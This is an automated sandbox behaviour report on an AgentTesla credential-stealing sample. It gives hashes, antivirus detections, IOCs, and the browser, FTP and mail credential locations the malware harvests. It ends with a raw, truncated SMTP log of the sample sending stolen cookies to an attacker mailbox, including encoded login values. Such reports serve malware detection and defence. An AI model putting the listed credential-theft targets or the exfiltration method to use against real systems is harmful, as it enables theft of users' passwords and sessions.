· 6 years ago · Sep 06, 2019, 10:40 AM
1
2* ID: 1233
3* MalFamily: "AgentTesla"
4
5* MalScore: 10.0
6
7* File Name: "AgentTesla_01233c83b6f43d3afa5dc713ee7006b4.exe"
8* File Size: 872960
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "ed7feeee9e42840735b25547ea1146306f3b6f8aaefda21d0debdf9bdaa66ea7"
11* MD5: "01233c83b6f43d3afa5dc713ee7006b4"
12* SHA1: "e3d17559c8ab67ad9aa66c29390a42aad459e1dd"
13* SHA512: "4409df1287a2c84488409ac1ae29483f853ff7bee187b2305236bbca6086450b6490d619f0e4d7940abae4d9a29d60d3ef4648452a9561d74d778c2745fa5bef"
14* CRC32: "81106E86"
15* SSDEEP: "12288:vE3cSZnbcNHy9XUhrUGIYsxqrKRoF1V14H8zqFzHVDYpk2OAAx8IrdqqavEHAoeH:vscEaSVUhrBGG5F17F+jkp2EBva7eH"
16
17* Process Execution:
18 "1dEcdkZp.exe",
19 "walafk.exe",
20 "walafk.exe",
21 "services.exe",
22 "svchost.exe",
23 "WmiPrvSE.exe",
24 "lsass.exe"
25
26
27* Executed Commands:
28 "\"C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe\"",
29 "C:\\Windows\\system32\\lsass.exe"
30
31
32* Signatures Detected:
33
34 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
35 "Details":
36
37
38 "Description": "Behavioural detection: Executable code extraction",
39 "Details":
40
41
42 "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
43 "Details":
44
45 "IP_ioc": "199.79.63.211:587 (United States)"
46
47
48
49
50 "Description": "Creates RWX memory",
51 "Details":
52
53
54 "Description": "Guard pages use detected - possible anti-debugging.",
55 "Details":
56
57
58 "Description": "A process attempted to delay the analysis task.",
59 "Details":
60
61 "Process": "walafk.exe tried to sleep 1521 seconds, actually delayed analysis time by 0 seconds"
62
63
64 "Process": "WmiPrvSE.exe tried to sleep 602 seconds, actually delayed analysis time by 0 seconds"
65
66
67
68
69 "Description": "Drops a binary and executes it",
70 "Details":
71
72 "binary": "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe"
73
74
75
76
77 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
78 "Details":
79
80 "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
81
82
83 "suspicious_request_iocs": "http://checkip.amazonaws.com/"
84
85
86
87
88 "Description": "Performs some HTTP requests",
89 "Details":
90
91 "url_iocs": "http://checkip.amazonaws.com/"
92
93
94
95
96 "Description": "The binary likely contains encrypted or compressed data.",
97 "Details":
98
99 "section": "name: .rsrc, entropy: 7.57, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00045400, virtual_size: 0x0004528c"
100
101
102
103
104 "Description": "Behavioural detection: Injection (Process Hollowing)",
105 "Details":
106
107 "Injection": "walafk.exe(1376) -> walafk.exe(1824)"
108
109
110
111
112 "Description": "Executed a process and injected code into it, probably while unpacking",
113 "Details":
114
115 "Injection": "walafk.exe(1376) -> walafk.exe(1824)"
116
117
118
119
120 "Description": "Sniffs keystrokes",
121 "Details":
122
123 "SetWindowsHookExW": "Process: walafk.exe(1824)"
124
125
126
127
128 "Description": "Behavioural detection: Injection (inter-process)",
129 "Details":
130
131
132 "Description": "Behavioural detection: Injection with CreateRemoteThread in a remote process",
133 "Details":
134
135
136 "Description": "Tries to unhook or modify Windows functions monitored by Cuckoo",
137 "Details":
138
139 "unhook": "function_name: NtCreateSection, type: modification"
140
141
142
143
144 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
145 "Details":
146
147 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 10991925 times"
148
149
150
151
152 "Description": "Steals private information from local Internet browsers",
153 "Details":
154
155 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
156
157
158 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
159
160
161
162
163 "Description": "File has been identified by 41 Antiviruses on VirusTotal as malicious",
164 "Details":
165
166 "MicroWorld-eScan": "Trojan.GenericKD.41705566"
167
168
169 "McAfee": "RDN/Generic.grp"
170
171
172 "Cylance": "Unsafe"
173
174
175 "BitDefender": "Trojan.GenericKD.41705566"
176
177
178 "K7GW": "Trojan ( 005573421 )"
179
180
181 "CrowdStrike": "win/malicious_confidence_100% (W)"
182
183
184 "TrendMicro": "TROJ_FRS.VSNTI519"
185
186
187 "F-Prot": "W32/Delf.IX.gen!Eldorado"
188
189
190 "ESET-NOD32": "a variant of Win32/Injector.EHQI"
191
192
193 "APEX": "Malicious"
194
195
196 "Avast": "Win32:Trojan-gen"
197
198
199 "GData": "Trojan.GenericKD.41705566"
200
201
202 "Kaspersky": "HEUR:Trojan.Win32.Crypt.gen"
203
204
205 "Paloalto": "generic.ml"
206
207
208 "AegisLab": "Trojan.Multi.Generic.4!c"
209
210
211 "Endgame": "malicious (high confidence)"
212
213
214 "F-Secure": "Trojan.TR/Kryptik.lntpi"
215
216
217 "DrWeb": "Trojan.PWS.Stealer.19347"
218
219
220 "Invincea": "heuristic"
221
222
223 "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.cc"
224
225
226 "Trapmine": "malicious.moderate.ml.score"
227
228
229 "FireEye": "Generic.mg.01233c83b6f43d3a"
230
231
232 "Emsisoft": "Trojan.GenericKD.41705566 (B)"
233
234
235 "SentinelOne": "DFI - Suspicious PE"
236
237
238 "Cyren": "W32/Delf.IX.gen!Eldorado"
239
240
241 "Avira": "TR/Kryptik.lntpi"
242
243
244 "Microsoft": "Trojan:Win32/lokibot.SI!MTB"
245
246
247 "Arcabit": "Trojan.Agent.EDGB"
248
249
250 "ZoneAlarm": "HEUR:Trojan.Win32.Crypt.gen"
251
252
253 "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
254
255
256 "Ad-Aware": "Trojan.Agent.EDGB"
257
258
259 "Malwarebytes": "Trojan.MalPack.DLF"
260
261
262 "TrendMicro-HouseCall": "TROJ_FRS.VSNTI519"
263
264
265 "Rising": "Trojan.Injector!1.AFE3 (CLASSIC)"
266
267
268 "Ikarus": "Trojan.Win32.Krypt"
269
270
271 "Fortinet": "W32/Injector.EHDJ!tr"
272
273
274 "Webroot": "W32.Trojan.Gen"
275
276
277 "AVG": "Win32:Trojan-gen"
278
279
280 "Cybereason": "malicious.9c8ab6"
281
282
283 "Panda": "Trj/CI.A"
284
285
286 "Qihoo-360": "HEUR/QVM05.1.ACA2.Malware.Gen"
287
288
289
290
291 "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
292 "Details":
293
294
295 "Description": "Creates a copy of itself",
296 "Details":
297
298 "copy": "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe"
299
300
301
302
303 "Description": "Harvests credentials from local FTP client softwares",
304 "Details":
305
306 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
307
308
309 "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\"
310
311
312 "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\*.xml"
313
314
315 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
316
317
318 "file": "C:\\Users\\user\\AppData\\Roaming\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini"
319
320
321 "file": "C:\\cftp\\Ftplist.txt"
322
323
324 "key": "HKEY_CURRENT_USER\\Software\\FTPWare\\COREFTP\\Sites"
325
326
327
328
329 "Description": "Harvests information related to installed mail clients",
330 "Details":
331
332 "file": "C:\\Users\\user\\AppData\\Roaming\\Thunderbird\\profiles.ini"
333
334
335 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676"
336
337
338 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
339
340
341 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password"
342
343
344 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
345
346
347 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Password"
348
349
350 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
351
352
353 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Password"
354
355
356 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
357
358
359 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password"
360
361
362 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
363
364
365 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password"
366
367
368 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password"
369
370
371 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
372
373
374 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password"
375
376
377 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password"
378
379
380 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
381
382
383
384
385 "Description": "Makes SMTP requests, possibly sending spam or exfiltrating data.",
386 "Details":
387
388 "SMTP": "199.79.63.218 (us3.smtp.mailhostbox.com)"
389
390
391
392
393 "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
394 "Details":
395
396 "file": "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe:ZoneIdentifier"
397
398
399
400
401 "Description": "Collects information to fingerprint the system",
402 "Details":
403
404
405 "Description": "Anomalous binary characteristics",
406 "Details":
407
408 "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
409
410
411
412
413
414* Started Service:
415 "VaultSvc"
416
417
418* Mutexes:
419 "Global\\CLR_PerfMon_WrapMutex",
420 "Global\\CLR_CASOFF_MUTEX",
421 "Global\\.net clr networking",
422 "Local\\_!MSFTHISTORY!_",
423 "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
424 "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
425 "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!"
426
427
428* Modified Files:
429 "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe",
430 "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe:ZoneIdentifier",
431 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
432 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
433 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
434 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1\\Chrome\\Default\\Cookies",
435 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1.zip",
436 "C:\\Users\\user\\AppData\\Roaming\\DmzXBTkF7B.jpeg",
437 "C:\\Users\\user\\AppData\\Roaming\\CcmAKWrq5r.jpeg",
438 "C:\\Users\\user\\AppData\\Roaming\\Bzs5jkdOwZ.jpeg",
439 "C:\\Users\\user\\AppData\\Roaming\\Ay41cTrAQU.jpeg",
440 "C:\\Users\\user\\AppData\\Roaming\\K960sd8oiN.jpeg",
441 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
442 "\\??\\WMIDataDevice",
443 "\\??\\PIPE\\wkssvc",
444 "\\??\\PIPE\\srvsvc"
445
446
447* Deleted Files:
448 "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe",
449 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1\\Chrome\\Default\\Cookies",
450 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1\\Chrome\\Default",
451 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1\\Chrome",
452 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1",
453 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1.zip"
454
455
456* Modified Registry Keys:
457 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\walafk_RASAPI32",
458 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\EnableFileTracing",
459 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\EnableConsoleTracing",
460 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\FileTracingMask",
461 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\ConsoleTracingMask",
462 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\MaxFileSize",
463 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\FileDirectory",
464 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type"
465
466
467* Deleted Registry Keys:
468
469* DNS Communications:
470
471 "type": "A",
472 "request": "checkip.amazonaws.com",
473 "answers":
474
475 "data": "52.55.255.113",
476 "type": "A"
477
478
479 "data": "52.44.169.135",
480 "type": "A"
481
482
483 "data": "checkip.us-east-1.prod.check-ip.aws.a2z.com",
484 "type": "CNAME"
485
486
487 "data": "18.205.71.63",
488 "type": "A"
489
490
491 "data": "checkip.check-ip.aws.a2z.com",
492 "type": "CNAME"
493
494
495 "data": "18.214.132.216",
496 "type": "A"
497
498
499 "data": "3.224.145.145",
500 "type": "A"
501
502
503 "data": "34.196.181.158",
504 "type": "A"
505
506
507
508
509 "type": "A",
510 "request": "us3.smtp.mailhostbox.com",
511 "answers":
512
513 "data": "199.79.63.211",
514 "type": "A"
515
516
517 "data": "199.79.63.218",
518 "type": "A"
519
520
521
522
523
524* Domains:
525
526 "ip": "199.79.63.218",
527 "domain": "us3.smtp.mailhostbox.com"
528
529
530 "ip": "34.196.181.158",
531 "domain": "checkip.amazonaws.com"
532
533
534
535* Network Communication - ICMP:
536
537* Network Communication - HTTP:
538
539 "count": 1,
540 "body": "",
541 "uri": "http://checkip.amazonaws.com/",
542 "user-agent": "",
543 "method": "GET",
544 "host": "checkip.amazonaws.com",
545 "version": "1.1",
546 "path": "/",
547 "data": "GET / HTTP/1.1\r\nHost: checkip.amazonaws.com\r\nConnection: Keep-Alive\r\n\r\n",
548 "port": 80
549
550
551
552* Network Communication - SMTP:
553
554 "raw": "EHLO Host\r\nAUTH login d2FsYUBsb2dyb29tLnRvcA==\r\nXnQjck9WUTk=\r\nMAIL FROM:<wala@logroom.top>\r\nRCPT TO:<wala@logroom.top>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: wala@logroom.top\r\nTo: wala@logroom.top\r\nDate: 6 Sep 2019 07:47:39 -0700\r\nSubject: user/Host Recovered Cookies\r\nContent-Type: multipart/mixed; boundary=--boundary_0_df9e029a-1917-4f66-9070-834df45f117d\r\n\r\n\r\n----boundary_0_df9e029a-1917-4f66-9070-834df45f117d\r\nContent-Type: text/html; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nTime: 09/06/2019 06:57:17<br>UserName: user<br>ComputerName: Host<br>OSFullName:=\r\n Microsoft Windows 7 Enterprise N <br>CPU: Intel(R) Core(TM)CPU E5-2670=\r\n 0 @ 2.60GHz<br>RAM: 4095.55 MB<br>IP: 0.0.0.0=0A<hr>\r\n----boundary_0_df9e029a-1917-4f66-9070-834df45f117d\r\nContent-Type: application/octet-stream; name=svuszppr.ac1.zip\r\nContent-Transfer-Encoding: base64\r\n\r\nUEsDBBQAAAgIAO5BEU+6/tz3dBIAAABQAAAjAAAAc3Z1c3pwcHIuYWMxL0Nocm9tZS9EZWZh\r\ndWx0L0Nvb2tpZXPtvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymr\r\nKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwf\r\nPyJe/8Tzos3T86peZG1679f4zX6NX/PX/DV+zzT9NX4N+vXX+DV+3V/DPb8W/f/X8f7+Nb3f\r\nh57f7NcY7zz6jX/T/+3X+HV+4+Nf4ze9+E3/xd/4+Dc9uPGtHz0/en70/Oj50fOj50fPj54f\r\nPT96fvT86Pl/4/OHtr/2r//b/o6/46/5R/4ebTYp82lVvS3yRn/8OievTo/fnKZvjp88P031\r\nw3RrWudZW1TL33/dTtOzF29OPz99lb748k364qvnz0fzqml//7f5dfrm9Pd+4z5eZou889Fl\r\nVq67n62ydt75KH+3Kuq8ifdWNL9/k0/XdR79at62q2pZXve/LDPCMptO82YAcDrPmt9fu+59\r\nmz49fXb81fM36e4opW5Wed0UTZsv200tV3VR1UXbR8Zrky+n9fWqzWe/vxDnyfMvn9ivP/54\r\ndF7UTbvK6vY6OizbdGf01Yuzn/jqNN0y0zFKMQOjFAS+c2f71/n1ftvj3/HX/DWK5Sx/1/yi\r\nkoLo3z9btxX//fvrTP/+u/rLr3v+a/76v+1v/Vv/mn/wXWaSRd5m+P+vFbAHPtnCvD//8sXn\r\nP3n86uTbxx5iis7LV2dfHL/6fdLf6/T3GaUyRK/5nY9/rV/vtz38rYfQQg+//y7+/bWJc38D\r\nsO9vTP//tX/Tf+TX+E3/h9/0P6IfP3p+9Pzo+dHzo+dHz4+eHz0/en70/Oj50fOj50fPj57/\r\nVz6/06/9ax/+5pyNmVYLSk4UlGD4/S+RUKmWuzu/0a/1a/+Ov7n96zf7NX/tH//NF4ts9fs3\r\nbdaum+3d5NdA/P9P/xq/6T/9m/7Pv+l/fmNnP3p+9Pzo+dHzo+dHz4+eHz0/en70/Oj50fOj\r\n50fPj56fy+d3/LUPf82BLMCv/Rv+2r/jr6m//1q/ya/94z/mZQB+Y3r1x36tf+fX+I1/5jf8\r\n637sP/8N/qDf5N//df/UX+cnfr1/iD760fOj5//Dzx/S/oa/2a/347/1b/w7/no/9mP0vx/7\r\nw979Br/G+H/4L/+9e9/7peOLqroo8zGJyusXZ0/vkmwU59e/xvj/PNvd+tW/1LT6NQnIv/TH\r\n/fn/4a/5W//Lv/kf94Nf4x/68h/5M/9bfPb5P/dP/g1f/M3f+/Iv/WsWf8ufXVX/Ejr7tbjL\r\n3+yc/qEmKf34BWd/+O/5j/5j3/6//pU/Kf8H/si/8Hfe+sn/4foPerrzT/wl/+Tuv/Nb/B7N\r\nP/LPov1v8gfJq2j/E//Lb/T3/LZ/5q/z6lf9+J/0f/yZH/0dT97+8//a3/Avpl/8TT9+5yd+\r\ns5/6dX67P+YPoDb/yi/4ff7TX/u3+uP+y+u/7I//X/74v+7j2e/5W3z1r/zRn/wXf9vib/8d\r\n/+n1P/gL/rW/6u/+7f+NP+U/+1MP/5R/+Sc+e/2r/ox/5+//1/6yn/p1/5x//n/9t//u33r1\r\n75wXv9F/84/+W6v23n/zd//3f/GP/8errT/yV35v/F/8aX/nv/XH/QkP/vYvv/e3/a+/5d3f\r\nk/q4+53/6bf5I3/Jf3/vr/zHfjAv/+Pf+p/+O/+3f+rh9Q/+qJ/89T/7bf+wk//7H/g9Tx/8\r\n8//cH/AH/OV/9K/9y36w96//N7/ps7/87z35W/+Ot/f+mJ/8Tf793++X/dI/9t/7Q36PH/vN\r\nfr07v/lv/Jv+er/Bb8Bk/+2E7J/9Jv/k1dWVR/mnP3kXX/zf/9u3fg3T4MMo/hf80X/Ev/i/\r\nFX/Yb/2vH/+an3/8f/9Ws3/l6fdXv/i/fLj9z289+NdH3/7OqEvxf+VfO/8H/vL/48X/Mvr4\r\nD/h9/5fv/8X/9b/9l/6l//Bf/TN/8r2Tv+D5xS/9J9O/d4fa/B9/16/14lf+Rf/Sn/mn/7r1\r\n3/4v/02/41/0+/1l//ff/d/8zj/z63707/3GP/1v/bv/8Kd/x5+Sffdf/6P+8Lftv/ny0f0/\r\n50/8C0HBj/6Ih//68k/+x/7+P/m/+eRP/8+/+zf+6f/Tn/Of/G/v/o9nv/8f92v/en/Rb/df\r\n/Bu//5/9z/9ly9/++R9/+fH13/tH/qGTP+Pib/w7/ovnH/0Vf8+f/uv/Y3/4f/J//4//yx/1\r\nh3zrN/jNfr3f9Te1FPxDlXF3/6yr8XU2rypQ78ndX+Pub/hnzE/fXZnvPox4/+EvuvNf/YP/\r\n0U+VP/Vn7vyyf/33+7PePvo//vKv7vz3H/019/6EP2L9b37xv/61XeL9CX/af/Rb/5Lv/1X/\r\n6F/3u/2pf+m//Mf/Gb/h9/6I+S84+I/fvPv7/8J/9dv3PvmdrtDmL/qv/8SDX3Z+decvevQ/\r\n/bm/7V/1+34//zd+q0/K/+j3vPgN/rw/5aOfXv5xfw2I9d//A//nr/vf/iu/+7//7/4j23/J\r\nTx58sfV/fPzuz/tPfvW35m/++N/rP/9Nf9F/l/5Hf8Hv8kf9xr/e9//8v+7wH/lFV8e/7N/+\r\ntz75hX/mf/1fPtz9l/7St7/hP/B/vPw9/tDPEpLy3xLEYin/I5Tdfvf/9m/weA1CzuL9O/6x\r\nf4P5+sPo9ev/gsff/oue/sufj/7Iv+J3+Hf+iL/k7/vP/5u/4vqjn3r1H/6nv/1/+Sf/gb/t\r\n6k/p0uv+H77zt60/+o/+qtlv9Qf9D//wr/2v/yPL9N/8rf7b3/oP+puTH/yX6V/yF7/9A/8m\r\navM7/u2/4jdI69/mf/zN/9m/9L//o/+Uv/y3+qd//Df7/sFPNr/6u7/W5//u/T/+r/hd/prf\r\n49c9+r/+x//998v/kH/6j/+b/vE/48//c/6x53/Jn/Q77vwvd//9//snP1n/bf/5H/rf/6pv\r\nP/w1v/enffxjv/3v8d1//V/8H3+jlzt/9K/zr/85v99v+vv91F/92/1XT36zP/zv/tvu/tGf\r\n/MO/65//l/2lv/nbav6b7f6S+f/4R/zqL//98k/5k39F/a9+9i9+59f5b0b/4f4/9VdP66d/\r\n7i/7W/7z//Cvv3j91/zee3/0f7z1L/yuf/a/+3f9Zn/5P/idf+Av+lW/7T/+G/3kn/Vb7P6Z\r\n3373PczfP/7Zf/zq9/kX/4t/88/+TR79V3/d//SP3Pnf/4Xz32H5R/zff9zf9H//Tv/uH/zH\r\nzX7T13/Y7/br/z7/5h/3H/wJf8bf9Vf/c7/ij/gVv9Hyf/s7/83/7AeP/7j/63f/X37ZP/Lu\r\nd/pDJr/ub/brbbv5+8N+b5q//+pP/A3+4z/zPxnPqjV5MdOymL4dL/P27OkpMf3v+t/9rj/2\r\n3f/EtPmwSTz+x//AP/Sv/j//kT/oyR/9f5Z/w8Vf+vf+s4t/+eQPav7gv/ev+wvy/y77id/h\r\nz+hO4t3f5b/4m//x33j6zx38EV8sd//z3/if2/sf/4DR9Pf/7f6tv/i/+8++vfgj/sJ/6SW1\r\n+Wv/5f919Tf+OX/E01/zL/+rv/MnfOcv+TV++r/6c/+Af/7ij/8zft+/6k/7+B/4A8/+sl/v\r\nN/rTf4NP/pi/4O//O+qf/J/+7J+4+5v8vv92+lf8a3/Ev5T+pf/eX/pHlT/9L/0L//3rv+0v\r\n/c1/1b/2l/3fv92/+1c8+rN+n/8ZRP7eX/Xr/ZEP/5q//mzy3/21/+If9Wv+TX/Y2Z/29s95\r\n89f8I//Ef/un/JV/0i//O/+cX/Gf3J/9H//u3/iX/bV/zR/0+/07r7/8/f+o9Ff9S3/7j/3+\r\n/9Lf8L3vffd3/stH35r+oU9/HTWFnpAQAf/xP++NJyQnn5+d3G3yrJ7Of43x//q3/Tr3f6c3\r\nLCs//rvVH0bm//Mf/3f/8j/jH/mb/qO//Df/zf6a4tf7o77zb/8Zv9vf8smb/+3v/K3/uz/4\r\np3/yt3n9C7tk/uue/C2n1V/5M//rH538t7/64cvf8K/ZfVD/nf/SH13Ws3/zN3v67/1z/80f\r\n9jdRm7/k7/hzfuzNr/+P/8W/8p969ttt/RqLP+9/+Ht+6Xeyv/v/+k3SX+N//q3/oD/5Z/7F\r\n3/SXHv+av8v4+nf/J/7x/+7//vJf+8/+kd/89X/7R/wDv+mf/uf+Hf/eL/0r//unv9Gn/8K/\r\n9E//zG/+E//F//Kv/w6/xf/+3/0TD88P/vVf9Js8f/kn/uu/1V/4/V/rf/rWr0r/xL/xtxn/\r\nlX/Lf/w7/6p/+e/4XY7/kMVf8ad99s/+tf/533j8Zx/9etd/9fTf/yv+4l/4j/z6n/7Tf87j\r\nf/s//Y3/2P/6z0nv/2/Pf8t/5Pf5/X7pT8//63//7eIv/MH0X/8T/5U/4G/7Nx/+q3/JH3/+\r\ne3/rD/17/q9vYRrTf+fv++V/9//0D/7fv+xP2/sVd3+73+FXfvHL7vw2v9tf9q/8X7/2vb/h\r\nV/ylf8+jf+Q/+N2+f+dP/0UP/rB/4t/9PT77j//ef+sv+f4f8NUf+Oiv+1/+z6u/7t/9E/+s\r\n/2L2P/6hX/zaPI3bvWn8qDuNCALKvM3D+fwI8/nv/hN/7m/3YfP5W//JO//Yv/f9f+I3bf/H\r\nn/wbH/2ln/0Rf9SdH/tn53/7//QX/TX/8n8y/4W/9u/xJ3Xnc/lX/Z//4n/8u/3Bya/3j/75\r\n//vv9Vv8KyfNX/R/1qsf/OTPHP+H/9rv9t/8iuTfxXz+we/+qF/3rz36o0a/x8Ev+93/uj/2\r\n3a/z5Nf683+937r8G//v7/72f8Of+PaX/or/4Q//73/Hv+/PfLr+B37xX/v6Lz795a//rL/x\r\nP1ymr/6Ol3/Xn3fnv/0Vr/6bw+n6X/xDfpvf5tff/WN+v1f/3eo3Ov9P/9yf+Wc++3v/x98x\r\n/89+t7/1d/3L/+lP15/9Bx//fX/rv/0v/fSf86v+/Xe/8b/0j83+xX/14V/8W/1vV+Nf8nv8\r\n1t/91u96+dc++DP+yI/+pu/+X3/+r/dn/fP/1f/0x/9j/+rv+Tuc/bEvv/X7/Qvf/j3+3d94\r\n8VP/2P/25/5zh//3b/PVH7L3y/703+p/+PN+8Gv9vr8O5vNf+8f/k//iP/gn/qjf6zf/fX63\r\nf/OL36k6+WW//z/xLxQHf8mf//3//Nf8i16t/vA/4z//9T+anP9df8+rv//3/0t/nT/3b7/6\r\nV/+K/+I3+p/+8L/9r27/+L+9+Kt/0e/1m3z3D/n9fi2ez67u+4/+wtqbz2M2XtB7v8HvX38z\r\nE/jFb/JX5r/53/Fb/If/4S/9Df6Gf+Nv+JXjv+ruf/FLL//UP+j0H/rrfpO/f/kHfPWvdCfw\r\n7uM//zf5v/7W6b949Tf/D3/F3uE/d/QHvvx1f/O/7T/5DX7T3/57v9+vn/w3v2P2ktr8hf/E\r\nX/9H/2Wf/ub/w1/67/13/0fy3/wu/9rf9IN/7Zf/5D+9+4v/qX/nf/yD//yzv+Ff/g//lr/s\r\n+vf4G/647/5Nf8nvc/lvXP1Nv+jfuvOTv+NP/Hp7f9Ff9Fv9C09/6cEf/Ff8iX//n/13/wF/\r\n/3/3N/863/4jf+of+K+f/5Mg8K/1P/7mf+vhX/on/5r/2k/9B7/OH7z49//cP+bTvb/8P/wn\r\n/73/7MFP/Do/+FPTf/KP+n1O/sq/8Df8R/+X3+Gv+nV+9R/0u/4tv9ev+T/+J//qP/D7P/4D\r\n/oCtf/BX/1+/6r/7k/+nPyT99YnAv73zpH5vcQ4Ov/ufeATeffn7f+f4FfkH//PJ9+rf7dcw\r\nLT6MxP/8v/Rf/Ybf+dXf+rX+uX/2L/3r/7Lf+Nf8Hf6drR9/+2v+yv/8/OJP+xPH/97Fr77q\r\nkvgf/sd+Wft/P/yN/5xf+snot/iF/9jkcvY//9V/wV/+y37J7/jXlzvb/+Gf+++/+s2ozfhf\r\n/OoHO3/eb5X9zL+ePvu1f/+f+Rwkuv6j//i/6u/7N3/n3+/v+q+/8z996299s//v/Gnf+vd/\r\n6z/u33/z1//x//h/dPx//dsnf+mf9Ff96l/7F33ry